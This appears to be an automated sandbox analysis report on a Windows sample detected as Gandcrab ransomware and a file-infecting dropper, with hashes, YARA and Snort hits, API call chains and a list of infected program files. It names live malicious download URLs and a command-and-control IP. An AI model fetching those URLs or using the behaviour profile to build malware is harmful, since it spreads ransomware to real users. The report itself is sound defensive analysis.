Windows Analysis Report
SY5DeZW6pz.exe

Overview

General Information

Sample Name: SY5DeZW6pz.exe
Analysis ID: 694552
MD5: 536f2c1238ef65a64820c35d4504ce67
SHA1: 7806d51132e40728f581374a9d72d9713bff2dd0
SHA256: b6a71449958283718f01e6be9f7a9eb057479072c1cc55f26a11b033ea210271
Tags: exe

Detection

Gandcrab, ReflectiveLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Gandcrab
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected ReflectiveLoader
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Found evasive API chain (may stop execution after checking mutex)
Infects executable files (exe, dll, sys, html)
Contains functionality to determine the online IP of the system
Found Tor onion address
PE file has a writeable .text section
Uses known network protocols on non-standard ports
Machine Learning detection for sample
Machine Learning detection for dropped file
PE file contains section with special chars
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to dynamically determine API calls
Uses the system / local time for branch decision (may execute only at specific dates)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Entry point lies outside standard sections
Creates a DirectInput object (often for capturing keystrokes)
Queries information about the installed CPU (vendor, model number etc)
AV process strings found (often used to terminate AV products)
Installs a raw input device (often for capturing keystrokes)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
PE file contains more sections than normal
Contains functionality to enumerate device drivers
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • SY5DeZW6pz.exe (PID: 5580 cmdline: "C:\Users\user\Desktop\SY5DeZW6pz.exe" MD5: 536F2C1238EF65A64820C35D4504CE67)
    • vSQshX.exe (PID: 5540 cmdline: C:\Users\user\AppData\Local\Temp\vSQshX.exe MD5: 56B2C3810DBA2E939A8BB9FA36D3CF96)
      • WerFault.exe (PID: 5876 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 1432 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 1276 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5580 -s 532 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings (listed beneath each row)
SY5DeZW6pz.exe | ReflectiveLoader | Detects an unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended | Florian Roth
  • 0xf522:$x1: ReflectiveLoader
SY5DeZW6pz.exe | SUSP_RANSOMWARE_Indicator_Jul20 | Detects ransomware indicator | Florian Roth
  • 0xee7e:$: DECRYPT.txt
  • 0xeee4:$: DECRYPT.txt
SY5DeZW6pz.exe | JoeSecurity_Gandcrab | Yara detected Gandcrab | Joe Security
SY5DeZW6pz.exe | JoeSecurity_ReflectiveLoader | Yara detected ReflectiveLoader | Joe Security
SY5DeZW6pz.exe | INDICATOR_SUSPICIOUS_ReflectiveLoader | detects Reflective DLL injection artifacts | ditekSHen
  • 0xf521:$s1: _ReflectiveLoader@
  • 0xf522:$s2: ReflectiveLoader@
(1 further entry not shown)
Source | Rule | Description | Author
00000000.00000000.307805000.000000000F3A2000.00000008.00000001.01000000.00000003.sdmp | JoeSecurity_Gandcrab | Yara detected Gandcrab | Joe Security
00000000.00000000.324852504.000000000F3A2000.00000008.00000001.01000000.00000003.sdmp | JoeSecurity_Gandcrab | Yara detected Gandcrab | Joe Security
00000000.00000000.307798996.000000000F39A000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_ReflectiveLoader | Yara detected ReflectiveLoader | Joe Security
00000000.00000002.353018126.000000000F39A000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_ReflectiveLoader | Yara detected ReflectiveLoader | Joe Security
00000000.00000000.317764936.000000000F3A2000.00000008.00000001.01000000.00000003.sdmp | JoeSecurity_Gandcrab | Yara detected Gandcrab | Joe Security
(17 further entries not shown)
Source | Rule | Description | Author | Strings (listed beneath each row)
0.0.SY5DeZW6pz.exe.3760000.2.unpack | ReflectiveLoader | Detects an unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended | Florian Roth
  • 0xe522:$x1: ReflectiveLoader
0.0.SY5DeZW6pz.exe.3760000.2.unpack | SUSP_RANSOMWARE_Indicator_Jul20 | Detects ransomware indicator | Florian Roth
  • 0xde7e:$: DECRYPT.txt
  • 0xdee4:$: DECRYPT.txt
0.0.SY5DeZW6pz.exe.3760000.2.unpack | JoeSecurity_Gandcrab | Yara detected Gandcrab | Joe Security
0.0.SY5DeZW6pz.exe.3760000.2.unpack | JoeSecurity_ReflectiveLoader | Yara detected ReflectiveLoader | Joe Security
0.0.SY5DeZW6pz.exe.3760000.2.unpack | INDICATOR_SUSPICIOUS_ReflectiveLoader | detects Reflective DLL injection artifacts | ditekSHen
  • 0xe521:$s1: _ReflectiveLoader@
  • 0xe522:$s2: ReflectiveLoader@
(43 further entries not shown)
                    No Sigma rule has matched
Timestamp: 08/31/22-23:41:31.686542
Source IP: 192.168.2.4
Destination IP: 63.251.106.25
SID: 2807908
Source Port: 49708
Destination Port: 799
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 08/31/22-23:41:23.030290
Source IP: 192.168.2.4
Destination IP: 63.251.106.25
SID: 2807908
Source Port: 49707
Destination Port: 799
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 08/31/22-23:41:22.706087
Source IP: 192.168.2.4
Destination IP: 8.8.8.8
SID: 2838522
Source Port: 58565
Destination Port: 53
Protocol: UDP
Classtype: A Network Trojan was detected

                    AV Detection

Source: SY5DeZW6pz.exe | Virustotal: Detection: 81%
Source: SY5DeZW6pz.exe | Metadefender: Detection: 65%
Source: SY5DeZW6pz.exe | ReversingLabs: Detection: 95%
Source: SY5DeZW6pz.exe | Avira: detected
Source: http://ddos.dnsnb8.net:799/cj//k3.rar% | Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k3.rar | Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rar% | Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rar | Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net/& | Avira URL Cloud: Label: malware
Source: ddos.dnsnb8.net | Virustotal: Detection: 5%
Source: http://ddos.dnsnb8.net:799/cj//k3.rar | Virustotal: Detection: 6%
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe | Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe | Avira: detection malicious, Label: TR/Dldr.Small.Z.haljq
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe | Metadefender: Detection: 76%
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe | ReversingLabs: Detection: 100%
Source: SY5DeZW6pz.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe | Joe Sandbox ML: detected
Source: 1.0.vSQshX.exe.c20000.3.unpack | Avira: Label: W32/Jadtre.D
Source: 0.2.SY5DeZW6pz.exe.3760000.0.unpack | Avira: Label: W32/Jadtre.B
Source: 0.2.SY5DeZW6pz.exe.f390000.1.unpack | Avira: Label: W32/Jadtre.B
Source: 1.0.vSQshX.exe.c20000.0.unpack | Avira: Label: W32/Jadtre.D
Source: 1.2.vSQshX.exe.c20000.0.unpack | Avira: Label: W32/Jadtre.D
Source: 0.0.SY5DeZW6pz.exe.3760000.2.unpack | Avira: Label: W32/Jadtre.B
Source: 1.0.vSQshX.exe.c20000.1.unpack | Avira: Label: W32/Jadtre.D
Source: 0.0.SY5DeZW6pz.exe.f390000.3.unpack | Avira: Label: W32/Jadtre.B
Source: 0.0.SY5DeZW6pz.exe.f390000.1.unpack | Avira: Label: W32/Jadtre.B
Source: 0.0.SY5DeZW6pz.exe.f390000.0.unpack | Avira: Label: W32/Jadtre.B
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe | Code function: 0_2_0F394950 Sleep,ExitProcess,CreateThread,WaitForSingleObject,TerminateThread,CloseHandle,VirtualAlloc,GetModuleFileNameW,VirtualFree,ExitProcess,Sleep,lstrlenA,VirtualAlloc,CryptStringToBinaryA,ExitProcess,InitializeCriticalSection,DeleteCriticalSection,VirtualAlloc,GetModuleFileNameW,VirtualFree,ShellExecuteW,ExitThread
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe | Code function: 0_2_0F398150 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe | Code function: 0_2_0F3962B0 CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptGenKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CryptAcquireContextW
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe | Code function: 0_2_0F396530 EnterCriticalSection,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe | Code function: 0_2_0F395210 lstrlenA,VirtualAlloc,CryptStringToBinaryA,_memset,lstrlenA,lstrlenA,lstrlenA,VirtualAlloc,lstrcpyA,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,VirtualFree,GetLastError
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe | Code function: 0_2_0F395670 VirtualAlloc,wsprintfW,lstrlenW,lstrlenW,lstrlenW,_memset,lstrlenA,lstrlenW,lstrlenW,CryptBinaryToStringA,GetLastError,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,VirtualFree,VirtualFree,VirtualFree
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe | Code function: 0_2_0F3982A0 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe | Code function: 0_2_0F395880 VirtualAlloc,CryptBinaryToStringA,CryptBinaryToStringA,CryptBinaryToStringA,lstrlenA,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrcatW,lstrcatW,lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenA,lstrlenW,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenA,lstrlenW,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenW,VirtualAlloc,lstrlenW,lstrlenW,_memset,lstrlenA,lstrlenA,CryptBinaryToStringA,GetLastError,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,MultiByteToWideChar,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree
Source: SY5DeZW6pz.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: SY5DeZW6pz.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH

                    Spreading

                    barindex
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\google\Update\1.3.36.131\GoogleUpdateComRegisterShell64.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.NetFX40.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files\Google\Chrome\Application\104.0.5112.81\chrome_pwa_launcher.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\google\Update\1.3.36.131\GoogleUpdate.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\lync.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\misc.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\DCF\filecompare.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\lync99.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\autoit3\AutoIt3Help.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\java\jre1.8.0_211\bin\ssvagent.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\UcMapi.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\ONENOTE.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\PDFREFLOW.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\autoit3\Examples\Helpfile\Extras\MyProg.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\WINWORD.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroBroker.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\MSOSREC.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\OUTLOOK.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\DCF\Common.DBConnection.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\protocolhandler.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\MSQRY32.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\wow_helper.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files\Google\Chrome\Application\104.0.5112.81\notification_helper.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\arh.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\SELFCERT.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.NetFX45.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\WORDICON.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\MSPUB.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\google\Update\1.3.36.131\GoogleCrashHandler64.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files\Google\Chrome\Application\chrome.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\java\jre1.8.0_211\bin\jabswitch.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\DCF\DATABASECOMPARE.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\google\Update\1.3.36.131\GoogleCrashHandler.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\SETLANG.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\autoit3\Aut2Exe\Aut2exe_x64.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\ACCICONS.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\FIRSTRUN.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\MSACCESS.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\POWERPNT.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\autoit3\Uninstall.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\google\Update\1.3.36.131\GoogleUpdateCore.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\DCF\Common.ShowHelp.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\SCANPST.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\autoit3\Au3Check.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\java\jre1.8.0_211\bin\jp2launcher.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\MSOHTMED.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\CLVIEW.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\NAMECONTROLSERVER.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\IEContentService.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\java\jre1.8.0_211\bin\java.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\CNFNOT32.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files\Google\Chrome\Application\104.0.5112.81\Installer\chrmstp.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files\Microsoft Office\Office16\AppSharingHookController64.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\excelcnv.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\GROOVE.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\OcPubMgr.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroRd32Info.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\java\jre1.8.0_211\bin\java-rmi.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\google\Update\1.3.36.131\GoogleUpdateBroker.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\java\jre1.8.0_211\bin\unpack200.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\java\jre1.8.0_211\bin\javacpl.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\ONENOTEM.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroLayoutRecognizer\AcroLayoutRecognizer.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\msoev.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\MSOUC.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files\Microsoft Office\Office16\MSOHTMED.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\autoit3\SciTE\SciTE.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\GRAPH.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\EXCEL.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\PPTICO.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\LogTransport2.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\lynchtmlconv.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\java\jre1.8.0_211\bin\javaws.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files\Google\Chrome\Application\104.0.5112.81\elevation_service.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\Eula.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\autoit3\Au3Info.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\autoit3\AutoIt3_x64.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\AppSharingHookController.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\OSPPREARM.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\MSOSYNC.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\XLICONS.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\DCF\Common.DBConnection64.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files\Microsoft Office\Office16\msoia.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\104.0.5112.81\chrome_installer.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\autoit3\Au3Info_x64.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\Wordconv.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\autoit3\Aut2Exe\Aut2exe.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\DCF\SPREADSHEETCOMPARE.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft analysis services\AS OLEDB\110\SQLDumper.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe | System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\VPREVIEW.EXE
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe | System file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\reader_sl.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe | System file mapped for write: C:\Program Files (x86)\autoit3\Aut2Exe\upx.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe | System file mapped for write: C:\Program Files (x86)\google\Update\1.3.36.131\GoogleUpdateSetup.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe | System file mapped for write: C:\Program Files (x86)\microsoft office\Office16\msotd.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe | System file mapped for write: C:\Program Files (x86)\java\jre1.8.0_211\bin\orbd.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe | System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe | System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe
